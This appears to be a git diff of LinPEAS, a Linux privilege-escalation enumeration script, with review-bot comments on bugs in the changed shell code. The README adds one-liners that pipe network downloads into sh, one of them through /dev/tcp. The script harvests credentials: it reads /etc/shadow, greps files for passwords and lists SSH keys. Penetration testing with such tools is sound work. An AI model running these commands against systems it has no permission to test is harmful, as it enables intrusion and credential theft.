diff --git a/README.md b/README.md
index 6883f91..87bf13a 100644
--- a/README.md
+++ b/README.md
@@ -8,6 +8,23 @@ Also valid for **Unix systems**
[](https://asciinema.org/a/250532)
+**Quick Start**
+```bash
+#From github
+curl https://raw.githubusercontent.com/carlospolop/linux-privilege-escalation-awsome-script/master/linpeas.sh | sh
+```
+
+```bash
+#Local network
+python -m SimpleHTTPServer 80
+curl 10.10.10.10/linpeas.sh | sh
+
+#Without curl
+nc -lvnp 80 < linpeas.sh
+cat < /dev/tcp/10.10.10.10/80 | sh
+```
+
+
The goal of this script is to search for possible **Privilege Escalation vectors**.
This script doesn't have any dependency.
@@ -84,101 +101,4 @@ The default file where all the data is recorded is: */tmp/linPE* (you can change
file="/tmp/linPE";RED='\033[0;31m';Y='\033[0;33m';B='\033[0;34m';NC='\033[0m';rm -rf $file;echo "File: $file";echo "[+]Gathering system information...";printf $B"[*] "$RED"BASIC SYSTEM INFO\n"$NC >> $file ;echo "" >> $file;printf $Y"[+] "$RED"Operative system\n"$NC >> $file;(cat /proc/version || uname -a ) 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"PATH\n"$NC >> $file;echo $PATH 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Date\n"$NC >> $file;date 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Sudo version\n"$NC >> $file;sudo -V 2>/dev/null| grep "Sudo ver" >> $file;echo "" >> $file;printf $Y"[+] "$RED"selinux enabled?\n"$NC >> $file;sestatus 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Useful software?\n"$NC >> $file;which nc ncat netcat wget curl ping gcc make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Capabilities\n"$NC >> $file;getcap -r / 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Environment\n"$NC >> $file;(set || env) 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Top and cleaned proccesses\n"$NC >> $file;ps aux 2>/dev/null | grep -v "\[" >> $file;echo "" >> $file;printf $Y"[+] "$RED"Binary processes permissions\n"$NC >> $file;ps aux 2>/dev/null | awk '{print $11}'|xargs -r ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Services\n"$NC >> $file;(/usr/sbin/service --status-all || /sbin/chkconfig --list || /bin/rc-status) 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Different processes executed during 1 min (HTB)\n"$NC >> $file;if [ "`ps -e --format cmd`" ]; then for i in {1..121}; do ps -e --format cmd >> $file.tmp1; sleep 0.5; done; sort $file.tmp1 | uniq | grep -v "\[" | sed '/^.\{500\}./d' >> $file; rm $file.tmp1; fi;echo "" >> $file;printf $Y"[+] "$RED"Proccesses binary permissions\n"$NC >> $file;ps 
aux 2>/dev/null | awk '{print $11}'|xargs -r ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Scheduled tasks\n"$NC >> $file;crontab -l 2>/dev/null >> $file;ls -al /etc/cron* 2>/dev/null >> $file;cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/root /var/spool/anacron 2>/dev/null | grep -v "^#" >> $file;echo "" >> $file;printf $Y"[+] "$RED"Any sd* disk in /dev?\n"$NC >> $file;ls /dev 2>/dev/null | grep -i "sd" >> $file;echo "" >> $file;printf $Y"[+] "$RED"Storage information\n"$NC >> $file;df -h 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Unmounted file-system?\n"$NC >> $file;cat /etc/fstab 2>/dev/null | grep -v "^#" >> $file;echo "" >> $file;printf $Y"[+] "$RED"Printer?\n"$NC >> $file;lpstat -a 2>/dev/null >> $file;echo "" >> $file;echo "" >> $file;echo "[+]Gathering network information...";printf $B"[*] "$RED"NETWORK INFO\n"$NC >> $file ;echo "" >> $file;printf $Y"[+] "$RED"Hostname, hosts and DNS\n"$NC >> $file;cat /etc/hostname /etc/hosts /etc/resolv.conf 2>/dev/null | grep -v "^#" >> $file;dnsdomainname 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Networks and neightbours\n"$NC >> $file;cat /etc/networks 2>/dev/null >> $file;(ifconfig || ip a) 2>/dev/null >> $file;iptables -L 2>/dev/null >> $file;ip n 2>/dev/null >> $file;route -n 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Ports\n"$NC >> $file;(netstat -punta || ss -t; ss -u) 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Can I sniff with tcpdump?\n"$NC >> $file;timeout 1 tcpdump >> $file 2>&1;echo "" >> $file;echo "" >> $file;echo "[+]Gathering users information...";printf $B"[*] "$RED"USERS INFO\n"$NC >> $file ;echo "" >> $file;printf $Y"[+] "$RED"Me\n"$NC >> $file;(id || (whoami && groups)) 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Sudo -l without password\n"$NC >> $file;echo '' | sudo -S -l -k 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Do I have PGP keys?\n"$NC >> 
$file;gpg --list-keys 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Superusers\n"$NC >> $file;awk -F: '($3 == "0") {print}' /etc/passwd 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Login\n"$NC >> $file;w 2>/dev/null >> $file;last 2>/dev/null | tail >> $file;echo "" >> $file;printf $Y"[+] "$RED"Users with console\n"$NC >> $file;cat /etc/passwd 2>/dev/null | grep "sh$" >> $file;echo "" >> $file;printf $Y"[+] "$RED"All users\n"$NC >> $file;cat /etc/passwd 2>/dev/null | cut -d: -f1 >> $file;echo "" >> $file;echo "" >> $file;echo "[+]Gathering files information...";printf $B"[*] "$RED"INTERESTING FILES\n"$NC >> $file ;echo "" >> $file;printf $Y"[+] "$RED"SUID\n"$NC >> $file;find / -perm -4000 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"SGID\n"$NC >> $file;find / -perm -g=s -type f 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Files inside \$HOME (limit 20)\n"$NC >> $file;ls -la $HOME 2>/dev/null | head -n 20 >> $file;echo "" >> $file;printf $Y"[+] "$RED"20 First files of /home\n"$NC >> $file;find /home -type f 2>/dev/null | column -t | grep -v -i "/"$USER | head -n 20 >> $file;echo "" >> $file;printf $Y"[+] "$RED"Files inside .ssh directory?\n"$NC >> $file;find /home /root -name .ssh 2>/dev/null -exec ls -laR {} \; >> $file;echo "" >> $file;printf $Y"[+] "$RED"*sa_key* files\n"$NC >> $file;find / -type f -name "*sa_key*" -ls 2>/dev/null -exec ls -l {} \; >> $file;echo "" >> $file;printf $Y"[+] "$RED"Mails?\n"$NC >> $file;ls -alh /var/mail/ /var/spool/mail/ 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"NFS exports?\n"$NC >> $file;cat /etc/exports 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Hashes inside /etc/passwd? 
Readable /etc/shadow or /etc/master.passwd?\n"$NC >> $file;grep -v '^[^:]*:[x]' /etc/passwd 2>/dev/null >> $file;cat /etc/shadow /etc/master.passwd 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Readable /root?\n"$NC >> $file;ls -ahl /root/ 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Inside docker or lxc?\n"$NC >> $file;dockercontainer=`grep -i docker /proc/self/cgroup 2>/dev/null; find / -name "*dockerenv*" -exec ls -la {} \; 2>/dev/null`;lxccontainer=`grep -qa container=lxc /proc/1/environ 2>/dev/null`;if [ "$dockercontainer" ]; then echo "Looks like we're in a Docker container" >> $file; fi;if [ "$lxccontainer" ]; then echo "Looks like we're in a LXC container" >> $file; fi;echo "" >> $file;printf $Y"[+] "$RED"*_history, profile, bashrc, httpd.conf\n"$NC >> $file;find / -type f \( -name "*_history" -o -name "profile" -o -name "*bashrc" -o -name "httpd.conf" \) -exec ls -l {} \; 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"All hidden files (not in /sys/) (limit 100)\n"$NC >> $file;find / -type f -iname ".*" -ls 2>/dev/null | grep -v "/sys/" | head -n 100 >> $file;echo "" >> $file;printf $Y"[+] "$RED"What inside /tmp, /var/tmp, /var/backups\n"$NC >> $file;ls -a /tmp /var/tmp /var/backups 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Interesting writable Files\n"$NC >> $file;USER=`whoami`;HOME=/home/$USER;find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' 2>/dev/null | grep -v '/proc/' | grep -v $HOME | grep -v '/sys/fs'| sort | uniq >> $file;for g in `groups`; do find / \( -type f -or -type d \) -group $g -perm -g=w 2>/dev/null | grep -v '/proc/' | grep -v $HOME | grep -v '/sys/fs'; done >> $file;echo "" >> $file;printf $Y"[+] "$RED"Web files?(output limited)\n"$NC >> $file;ls -alhR /var/www/ 2>/dev/null | head >> $file;ls -alhR /srv/www/htdocs/ 2>/dev/null | head >> $file;ls -alhR /usr/local/www/apache22/data/ 2>/dev/null | head >> $file;ls -alhR /opt/lampp/htdocs/ 2>/dev/null | 
head >> $file;echo "" >> $file;printf $Y"[+] "$RED"Backup files?\n"$NC >> $file;find /var /etc /bin /sbin /home /usr/local/bin /usr/local/sbin /usr/bin /usr/games /usr/sbin /root /tmp -type f \( -name "*back*" -o -name "*bck*" \) 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Find IPs inside logs\n"$NC >> $file;grep -a -R -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' /var/log/ 2>/dev/null | sort | uniq >> $file;echo "" >> $file;printf $Y"[+] "$RED"Find 'password' or 'passw' string inside /home, /var/www, /var/log, /etc\n"$NC >> $file;grep -lRi "password\|passw" /home /var/www /var/log 2>/dev/null | sort | uniq >> $file;echo "" >> $file;printf $Y"[+] "$RED"Sudo -l (you need to puts the password and the result appear in console)\n"$NC >> $file;sudo -l;
```
-
-## What does linpe look for
-- **System Information**
- - [x] SO & kernel version
- - [x] Sudo version
- - [x] PATH
- - [x] Date
- - [x] System stats
- - [x] Environment vars
- - [x] SElinux
- - [x] Printers
- - [x] Dmesg (signature verifications)
- - [x] Container?
-
-- **Devices**
- - [x] sd* in /dev
- - [x] Unmounted filesystems
-
-- **Available Software**
- - [x] Useful software
- - [x] Installed compilers
-
-- **Processes & Cron & Services**
- - [x] Cleaned processes
- - [x] Binary processes permissions
- - [x] Different processes executed during 1 min
- - [x] Cron jobs
- - [x] Services
-
-- **Network Information**
- - [x] Hostname, hosts & dns
- - [x] Content of /etc/inetd.conf
- - [x] Networks and neighbours
- - [x] Active ports
- - [x] Sniff permissions (tcpdump)
-
-- **Users Information**
- - [x] Info about current user
- - [x] PGP keys
- - [x] `sudo -l` without password
- - [x] doas config file
- - [x] Pkexec policy
- - [x] Try to login using `su` as other users (using null pass and the username)
- - [x] List of superusers
- - [x] List of users with console
- - [x] Login info
- - [x] List of all users
-
-- **Software Information**
- - [x] MySQl (Version, user being configured, loging as "root:root","root:toor","root:", user hashes extraction via DB and file, possible backup user configured)
- - [x] PostgreSQL (Version, try login in "template0" and "template1" as: "postgres:", "psql:")
- - [x] Apache (Version)
- - [x] PHP cookies
- - [x] Wordpress (Database credentials)
- - [x] Tomcat (Credentials)
- - [x] Mongo (Version)
- - [x] Supervisor (Credentials)
- - [x] Cesi (Credentials)
- - [x] Rsyncd (Credentials)
- - [x] Hostapd (Credentials)
- - [x] Wifi (Credentials)
- - [x] Anaconda-ks (Credentials)
- - [x] VNC (Credentials)
- - [x] LDAP database (Credentials)
- - [x] Open VPN files (Credentials)
- - [x] SSH (private keys, known_hosts, authorized_hosts, authorized_keys, main config parameters in sshd_config, certificates)
- - [X] PAM-SSH (Unexpected "auth" values)
- - [x] AWS (Files with AWS keys)
- - [x] NFS (privilege escalation misconfiguration)
- - [x] Kerberos (configuration & tickets in /tmp)
- - [x] Kibana (credentials)
- - [x] Logstash (Username and possible code execution)
- - [x] Elasticseach (Config info and Version via port 9200)
- - [x] Vault-ssh (Config values, secrets list and .vault-token files)
-
-
-- **Generic Interesting Files**
- - [x] SUID & SGID files
- - [x] Capabilities
- - [x] .sh scripts in PATH
- - [x] Hashes (passwd, shadow & master.passwd)
- - [x] Try to read root dir
- - [x] Files owned by root inside /home
- - [x] Reduced list of files inside my home and /home
- - [x] Mails
- - [x] Backup files
- - [x] DB files
- - [x] Web files
- - [x] Files that can contain passwords (and search for passwords inside *_history files)
- - [x] List of all hidden files
- - [x] List ALL writable files for current user (global, user and groups)
- - [x] Inside /tmp, /var/tmp and /var/backups
- - [x] Password ins config PHP files
- - [x] Get IPs, passwords and emails from logs
- - [x] "pwd" and "passw" inside files (and get most probable lines)
-
-
-By Polop(TM)
+By Polop(TM)
\ No newline at end of file
diff --git a/checks/README.md b/checks/README.md
new file mode 100644
index 0000000..7e7a16b
--- /dev/null
+++ b/checks/README.md
@@ -0,0 +1,99 @@
+# LinPEAS - Linux Privilege Escalation Awsome Script (with colors!!)
+
+Also valid for **Unix systems**
+
+## What does linpeas look for
+- **System Information**
+ - [x] SO & kernel version
+ - [x] Sudo version
+ - [x] PATH
+ - [x] Date
+ - [x] System stats
+ - [x] Environment vars
+ - [x] SElinux
+ - [x] Printers
+ - [x] Dmesg (signature verifications)
+ - [x] Container?
+
+- **Devices**
+ - [x] sd* in /dev
+ - [x] Unmounted filesystems
+
+- **Available Software**
+ - [x] Useful software
+ - [x] Installed compilers
+
+- **Processes & Cron & Services**
+ - [x] Cleaned processes
+ - [x] Binary processes permissions
+ - [x] Different processes executed during 1 min
+ - [x] Cron jobs
+ - [x] Services
+
+- **Network Information**
+ - [x] Hostname, hosts & dns
+ - [x] Content of /etc/inetd.conf
+ - [x] Networks and neighbours
+ - [x] Iptables rules
+ - [x] Active ports
+ - [x] Sniff permissions (tcpdump)
+
+- **Users Information**
+ - [x] Info about current user
+ - [x] PGP keys
+ - [x] `sudo -l` without password
+ - [x] doas config file
+ - [x] Pkexec policy
+ - [x] Try to login using `su` as other users (using null pass and the username)
+ - [x] List of superusers
+ - [x] List of users with console
+ - [x] Login info
+ - [x] List of all users
+
+- **Software Information**
+ - [x] MySQl (Version, user being configured, loging as "root:root","root:toor","root:", user hashes extraction via DB and file, possible backup user configured)
+ - [x] PostgreSQL (Version, try login in "template0" and "template1" as: "postgres:", "psql:")
+ - [x] Apache (Version)
+ - [x] PHP cookies
+ - [x] Wordpress (Database credentials)
+ - [x] Tomcat (Credentials)
+ - [x] Mongo (Version)
+ - [x] Supervisor (Credentials)
+ - [x] Cesi (Credentials)
+ - [x] Rsyncd (Credentials)
+ - [x] Hostapd (Credentials)
+ - [x] Wifi (Credentials)
+ - [x] Anaconda-ks (Credentials)
+ - [x] VNC (Credentials)
+ - [x] LDAP database (Credentials)
+ - [x] Open VPN files (Credentials)
+ - [x] SSH (private keys, known_hosts, authorized_hosts, authorized_keys, main config parameters in sshd_config, certificates)
+ - [X] PAM-SSH (Unexpected "auth" values)
+ - [x] AWS (Files with AWS keys)
+ - [x] NFS (privilege escalation misconfiguration)
+ - [x] Kerberos (configuration & tickets in /tmp)
+ - [x] Kibana (credentials)
+ - [x] Logstash (Username and possible code execution)
+ - [x] Elasticseach (Config info and Version via port 9200)
+ - [x] Vault-ssh (Config values, secrets list and .vault-token files)
+
+
+- **Generic Interesting Files**
+ - [x] SUID & SGID files
+ - [x] Capabilities
+ - [x] .sh scripts in PATH
+ - [x] Hashes (passwd, shadow & master.passwd)
+ - [x] Try to read root dir
+ - [x] Files owned by root inside /home
+ - [x] Reduced list of files inside my home and /home
+ - [x] Mails
+ - [x] Backup files
+ - [x] DB files
+ - [x] Web files
+ - [x] Files that can contain passwords (and search for passwords inside *_history files)
+ - [x] List of all hidden files
+ - [x] List ALL writable files for current user (global, user and groups)
+ - [x] Inside /tmp, /var/tmp and /var/backups
+ - [x] Password ins config PHP files
+ - [x] Get IPs, passwords and emails from logs
+ - [x] "pwd" and "passw" inside files (and get most probable lines)
\ No newline at end of file
diff --git a/linpeas.sh b/linpeas.sh
index b926111..6b54db4 100755
--- a/linpeas.sh
+++ b/linpeas.sh
@@ -1,6 +1,6 @@
#!/bin/sh
-VERSION="v2.0.2"
+VERSION="v2.0.3"
###########################################
#---------------) Colors (----------------#
@@ -298,14 +298,14 @@ echo ""
printf $B"=============================( "$GREEN"Devices"$B" )=============================\n"$NC
#-- 1D) sd in /dev
-printf $Y"[+] "$GREEN"Any sd* disk in /dev? (limit 10)\n"$NC
-ls /dev 2>/dev/null | grep -i "sd" | head -n 10
+printf $Y"[+] "$GREEN"Any sd* disk in /dev? (limit 20)\n"$NC
+ls /dev 2>/dev/null | grep -i "sd" | sed "s,crypt,${C}[1;31m&${C}[0m," | head -n 20
echo ""
#-- 2D) Unmounted
printf $Y"[+] "$GREEN"Unmounted file-system?\n"$NC
printf $B"[i] "$Y"Check if you can mount umounted devices\n"$NC
-cat /etc/fstab 2>/dev/null | grep -v "^#" | sed "s,$mountG,${C}[1;32m&${C}[0m,g" | sed "s,$notmounted,${C}[1;31m&${C}[0m," | sed "s,$mounted,${C}[1;34m&${C}[0m," | sed "s,$Wfolders,${C}[1;31m&${C}[0m," | sed "s,$mountpermsB,${C}[1;31m&${C}[0m,g" | sed "s,$mountpermsG,${C}[1;32m&${C}[0m,g"
+cat /etc/fstab 2>/dev/null | grep -v "^#" | sed "s,$mountG,${C}[1;32m&${C}[0m,g" | sed "s,$notmounted,${C}[1;31m&${C}[0m," | sed "s,$mounted,${C}[1;34m&${C}[0m," | sed "s,$Wfolders,${C}[1;31m&${C}[0m," | sed "s,$mountpermsB,${C}[1;31m&${C}[0m,g" | sed "s,$mountpermsG,${C}[1;32m&${C}[0m,g"
echo ""
echo ""
@@ -348,7 +348,7 @@ echo ""
if ! [ "$FAST" ] && ! [ "$VERYFAST" ]; then
printf $Y"[+] "$GREEN"Different processes executed during 1 min (interesting is low number of repetitions)\n"$NC
printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#frequent-cron-jobs\n"$NC
- if [ "`ps -e --format cmd 2>/dev/null`" ]; then for i in $(seq 1 1200); do ps -e --format cmd >> $file.tmp1; sleep 0.05; done; sort $file.tmp1 | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort | grep -E -v "\s*[1-9][0-9][0-9][0-9]"; rm $file.tmp1; fi
+ if [ "`ps -e --format cmd 2>/dev/null`" ]; then for i in $(seq 1 1250); do ps -e --format cmd >> $file.tmp1; sleep 0.05; done; sort $file.tmp1 | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort | grep -E -v "\s*[1-9][0-9][0-9][0-9]"; rm $file.tmp1; fi
echo ""
fi
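Review bot: The changed sampling loop still appends every `ps` snapshot to `$file.tmp1`, a predictable name derived from the report path (the README in this diff gives `/tmp/linPE` as the default), so on a multi-user host another local account can create or symlink that name before the run and influence what `sort` reads and what `rm` deletes. Allocating it with `tmp1=$(mktemp 2>/dev/null) || tmp1="$file.tmp1"` and using `$tmp1` in the loop, the `sort` and the `rm` closes that race with no change in output. The heading two lines above still says "during 1 min", yet 1250 iterations with a 0.05 s sleep already exceed a minute before counting the cost of each `ps` run; if the minute is the contract, bound the loop by elapsed time rather than by count.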
@@ -388,18 +388,23 @@ echo ""
printf $Y"[+] "$GREEN"Networks and neighbours\n"$NC
cat /etc/networks 2>/dev/null
(ifconfig || ip a) 2>/dev/null
-iptables -L 2>/dev/null
+cat /etc/iptables
ip n 2>/dev/null
route -n 2>/dev/null
echo ""
-#-- 4NI) Ports
+#-- 4NI) Iptables
+printf $Y"[+] "$GREEN"Iptables rules\n"$NC
+(iptables -L ; cat /etc/iptables/* | grep -v "^#") 2>/dev/null || echo_no
+echo ""
+
+#-- 5NI) Ports
printf $Y"[+] "$GREEN"Active Ports\n"$NC
printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#internal-open-ports\n"$NC
(netstat -punta || ss -t; ss -u) 2>/dev/null | sed "s,127.0.0.1,${C}[1;31m&${C}[0m,"
echo ""
-#-- 5NI) tcpdump
+#-- 6NI) tcpdump
printf $Y"[+] "$GREEN"Can I sniff with tcpdump?\n"$NC
tcpd=`timeout 1 tcpdump 2>/dev/null`
if [ "$tcpd" ]; then
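Review bot: The new `cat /etc/iptables` that replaces `iptables -L 2>/dev/null` has no stderr redirection and, judging by the `cat /etc/iptables/*` glob added a few lines below, `/etc/iptables` is expected to be a directory, so on most hosts this line prints a `cat:` error and nothing useful; since the new "Iptables rules" section already runs both `iptables -L` and `cat /etc/iptables/*`, the line looks like a leftover and should be removed. In that new section the `|| echo_no` fallback only sees the exit status of the final `grep -v "^#"`, so `echo_no` is appended after real `iptables -L` output whenever the config directory is empty, and it is skipped when `iptables -L` fails but a config file exists. Capturing the subshell's output into a variable and testing it with `[ "$out" ]`, as the tcpdump check just below does with `$tcpd`, gives the intended yes/no behaviour. The `if [ "$tcpd" ]` block at the end of the hunk continues outside it.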
@@ -609,8 +614,14 @@ fi
echo ""
#-- 9SI) PHP cookies files
+phpsess1=`ls /var/lib/php/sessions 2>/dev/null`
+phpsess2=`find /tmp /var/tmp -name "sess_*" 2>/dev/null`
printf $Y"[+] "$GREEN"Looking for PHPCookies\n"$NC
-ls /var/lib/php/sessions 2>/dev/null || echo_not_found
+if [ "$phpsess1" ] || [ "$phpsess2"]; then
+ if [ "$phpsess1" ]; then ls /var/lib/php/sessions 2>/dev/null; fi
+ if [ "$phpsess2" ]; then find /tmp /var/tmp -name "sess_*" 2>/dev/null; fi
+else echo_not_found
+fi
echo ""
#-- 10SI) Wordpress user, password, databname and host
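Review bot: `[ "$phpsess2"]` on the new `if` line is missing the space before `]`, so `[` receives the value and `]` as a single word and fails with "missing ]" (exit 2); because that test is the right operand of `||`, a host with session files only under /tmp or /var/tmp falls into the `else` branch and reports not found. The line should read `if [ "$phpsess1" ] || [ "$phpsess2" ]; then`. The two inner branches also rerun the `ls` and `find` whose output was just captured; printing the captured values with `printf '%s\n' "$phpsess1"` and `printf '%s\n' "$phpsess2"` avoids a second traversal of /tmp and /var/tmp and keeps the listing consistent with what was tested.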
@@ -910,14 +921,12 @@ printf $Y"[+] "$GREEN"Hashes inside passwd file? ........... "$NC
if [ "`grep -v '^[^:]*:[x\*]' /etc/passwd 2>/dev/null`" ]; then grep -v '^[^:]*:[x\*]' /etc/passwd 2>/dev/null | sed "s,.*,${C}[1;31m&${C}[0m,"
else echo_no
fi
-echo ""
##-- 6IF) Read shadow files
printf $Y"[+] "$GREEN"Can I read shadow files? ........... "$NC
if [ "`cat /etc/shadow /etc/master.passwd 2>/dev/null`" ]; then cat /etc/shadow /etc/master.passwd 2>/dev/null | sed "s,.*,${C}[1;31m&${C}[0m,"
else echo_no
fi
-echo ""
##-- 7IF) Read root dir
printf $Y"[+] "$GREEN"Can I read root folder? ........... "$NC
@@ -926,7 +935,7 @@ echo ""
##-- 8IF) Root file in home dirs
printf $Y"[+] "$GREEN"Looking for root files in home dirs (limit 20)"$NC
-(find /home $HOME -user root 2>/dev/null | head -n 20 | sed "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed "s,$USER,${C}[1;31m&${C}[0m,") || echo_not_found
+(find /home -user root 2>/dev/null | head -n 20 | sed "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed "s,$USER,${C}[1;31m&${C}[0m,") || echo_not_found
echo ""
##-- 9IF) Files inside my home
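Review bot: Dropping `$HOME` from the `find` narrows the "root files in home dirs" check to `/home`, so a caller whose home lives elsewhere (under /var or /opt, or /root) no longer has its own directory searched; if the intent was to avoid duplicate lines when `$HOME` is under `/home`, piping through `sort -u` is cheaper than losing that coverage. Independently, the `|| echo_not_found` fallback on this line can never fire: the subshell's status is that of the last `sed`, which exits 0 on empty input, so an empty result prints nothing instead of the fallback. Capture first and test, as the `tcpd=` check earlier in this diff does: `out=$(find /home "$HOME" -user root 2>/dev/null | head -n 20)`, then `if [ "$out" ]; then printf '%s\n' "$out" | sed ...; else echo_not_found; fi`.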
@@ -935,7 +944,7 @@ ls -la $HOME 2>/dev/null | head -n 23
echo ""
##-- 10IF) Files inside /home
-printf $Y"[+] "$GREEN"Files inside /home (limit 20)\n"$NC
+printf $Y"[+] "$GREEN"Files inside others home (limit 20)\n"$NC
(find /home -type f 2>/dev/null | grep -v -i "/"$USER | head -n 20) || echo_not_found
echo ""
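Review bot: The new heading promises "others home", but the filter on the line below it, `grep -v -i "/"$USER`, is a case-insensitive substring match on an unquoted variable: it also drops other users' homes whose names start with `$USER` (for user `bob`, everything under `/home/bobby`) and any file under /home whose path contains `/$USER`, and an empty `$USER` turns the pattern into `/` and suppresses every result. Anchoring it to the home path, `grep -v "^/home/$USER/"`, matches what the heading now claims. As in the root-files check above, the trailing `|| echo_not_found` is unreachable here because `head` exits 0 on empty input.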